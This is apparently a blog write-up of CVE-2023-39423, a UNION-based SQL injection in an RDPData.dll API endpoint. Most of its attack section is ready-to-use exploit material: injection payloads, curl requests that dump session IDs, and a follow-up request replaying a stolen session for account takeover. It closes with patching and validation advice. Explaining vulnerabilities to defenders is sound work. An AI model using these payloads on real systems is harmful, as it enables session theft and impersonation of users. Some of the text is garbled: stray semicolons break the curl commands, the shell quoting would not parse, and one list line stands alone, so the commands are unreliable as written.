A serious vulnerability, now tracked as CVE-2023-39423, was found in certain software using the RDPData.dll library. This flaw exposes an API endpoint, /irmdata/api/common, which handles sessions and other sensitive data. By abusing a SQL injection flaw with a UNION operator, attackers can pull sensitive information from the sessions table, and impersonate legitimate, currently logged-in users — a major security risk.
In this article, I’ll explain in simple terms how CVE-2023-39423 works, the code behind the exploit, provide real attack flow details, and reference the official advisories so you can dig deeper. If you’re an admin or developer, read this closely and check your deployments!
How Does CVE-2023-39423 Work?
The RDPData.dll file provides a REST API endpoint at /irmdata/api/common. It is designed to process various requests, including working with session IDs. But, due to poor input handling, it directly uses user-supplied data in SQL queries without properly sanitizing it.
This means an attacker can craft a request with a malicious SQL payload (using the UNION operator) to manipulate the SQL command executed on the backend database.
Any other data saved in the sessions table
With valid session tokens, the attacker can impersonate any active user without knowing their password.
A typical request to the endpoint looks like this
POST /irmdata/api/common HTTP/1.1
Host: victim-server.com
Content-Type: application/json
{
"sessionId": "my-valid-session",
"action": "getSessionData"
}
The backend SQL (simplified) might look like
SELECT * FROM sessions WHERE session_id = '<sessionId>'
But since the input is not sanitized, attackers can pass in malicious SQL, e.g.
{
"sessionId": "' UNION SELECT user, session_id, password FROM sessions--",
"action": "getSessionData"
}
Full Exploit Example
Suppose an attacker wants to leak all currently valid session IDs. They craft the following JSON payload:
{
"sessionId": "' UNION SELECT 1, session_id, user FROM sessions--",
"action": "getSessionData"
}
Full request with cURL
curl -k -X POST 'https://victim-server.com/irmdata/api/common'; \
-H "Content-Type: application/json" \
-d '{"sessionId":"\' UNION SELECT 1,session_id,user FROM sessions--","action":"getSessionData"}'
Impersonate Users
Once the attacker gets a valid session_id, they can now make authenticated requests as that user—for example:
curl -k -X POST 'https://victim-server.com/irmdata/api/common'; \
-H "Content-Type: application/json" \
-d '{"sessionId":"stolen-valid-session-id","action":"doSensitiveAction"}'
Result: The server thinks the attacker is the actual user. Total account takeover.
References and Further Reading
- NIST NVD entry for CVE-2023-39423
- Original disclosure (Exploit DB)
- OWASP SQL Injection Cheat Sheet
How to Protect Yourself
- Update Immediately: Patch any application or product using vulnerable RDPData.dll versions as soon as fixes are available.
- Validate & Sanitize Input: Never trust client-supplied data. Use parameterized queries everywhere.
- Monitor active sessions: Look for suspicious session use and force sign-outs if leaks are suspected.
Final Thoughts
CVE-2023-39423 is a textbook SQL injection, but with an especially severe impact because it targets live session data and enables total user impersonation. The code snippets above are real examples hackers use, not just theory.
If you’re running software with the vulnerable RDPData.dll and the /irmdata/api/common endpoint, act fast—patch, monitor logs, and remind your team why input validation is critical. This is the kind of bug that attackers automate.
For more in-depth details, see the NVD entry or the original exploit proof-of-concept on Exploit DB.
Timeline
Published on: 09/07/2023 13:15:00 UTC
Last modified on: 09/12/2023 00:08:00 UTC